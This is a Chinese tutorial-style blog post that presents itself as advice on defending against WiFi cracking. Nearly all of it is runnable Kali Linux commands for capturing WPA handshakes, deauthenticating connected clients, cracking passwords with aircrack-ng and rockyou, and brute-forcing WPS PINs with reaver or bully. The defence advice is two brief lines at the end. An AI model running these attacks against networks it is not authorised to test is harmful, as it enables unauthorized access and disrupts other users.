作者:keleisibuo | 来源:互联网 | 2023-07-25 11:15
**本文的主要目的是再次强调如何防范WiFiCracking**首先大致描述一下kalilinux破解wifi的方法与过程。因为了解过程便可加以防范跑包方法:0.输入指令
**
本文的主要目的是再次强调如何防范WiFi Cracking
**
首先大致描述一下kali linux破解wifi的方法与过程。因为了解过程便可加以防范
跑包方法:
0.输入指令 gzip -d /usr/share/wordlists/rockyou.txt.gz 解压kali linux附带的字典文件
1.输入指令 airmon-ng 列出支持监控模式的网卡
2.输入指令airmon-ng start wlan0(假设网卡wlan0是一张支持监控模式的网卡)
3.运行步骤2的指令后若提示“以下进程可能干扰airmon”,则用kill X(X是程序的PID或名字)指令或用airmon-ng check kill指令清楚这些进程,再次执行airmon-ng start wlan0,发现切换成功,这时输入ifconfig发现网卡名字变了,下面的命令用新网卡的名字执行
4.输入airodump-ng wlan0mon 查看附近的wifi热点,并记录下目标热点的BSSID以及频道号
4.输入airodump-ng -c 6 –bssid BC:46:99:66:F9:84 -w ~/ wlan0mon开始抓包
-c指定频道号
–-bssid指定路由器bssid(注意 bssid前有两个“-”)
-w指定抓取的数据包保存位置
最后空格+网卡名(wlan0mon)
这时只要有用户断开连接并重新连接即可自动获取握手包(等待或用步骤5的方法强制用户重连)(此时能看到连接网络的设备,及它们的设备号)
5.不要让步骤4的过程结束,在新的终端使用指令:aireplay-ng -0 2 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
6.当我们成功获取握手包,步骤4的界面右上角会提示WPA handshake: x,这时ctrl-c退出,并执行指令airmon-ng stop wlan0mon结束网卡的监控模式
7.输入指令 aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap 破解wifi密码
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
最后是抓取的包
8.若使用的是有显卡的终端,可以使用Hashcat来破解密码
wps方法:
1.依照“跑包方法”内容,将网卡设置为监控模式
2.输入airodump-ng wlan0mon 查看附近的wifi源,PWR下是信号强度,-60左右信号较好,绝对值越小信号越好,MB下的字符后面有.的说明没有启动WPS功能(暂不确定是没有启动还是不支持,后者可能有支持不启动的情况)
3.使用指令 bully wlan0mon -b xx:xx:xx:xx:xx:xx(BSSID值)或指令reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx可以开始跑pin,得到pin后会直接出密码(也可以手动调出密码)(bully与reaver指令后面都可以加一些设置项,如-c x(x是频道号(CH)可在airodump-ng wlan0mon中查看到))
暂时对自己的几个wifi发射器进行的实验中,跑包方法成功,wps方法部分成功
(以reaver为例分为三个情况:
1.wps未开启,出现associate的timeout,不成功。
2.wps开启,于是associate是成功了,但wps保护较强,直接出现eaplo的timeout,不成功。
3.wps开启且wps保护较强,可以跑pin,但每隔一段时间会禁止跑pin一段时间(此时暂时出现eaplo的timeout),视为成功
情况三是目前看到的最脆弱的wifi发射器,由于wps安全漏洞2011年便被提出,而现在是2018年,所以很多新路由器都进行了很多很强的wps保护
同时这也说明了,越是老的小区,wifi发射器可能就越老,越可能被攻破,就越是要提防wifi cracking的风险)
如何防范:
1.针对跑包方法:设置中英文混合密码,最好加符号
2.针对wps方法:关闭wps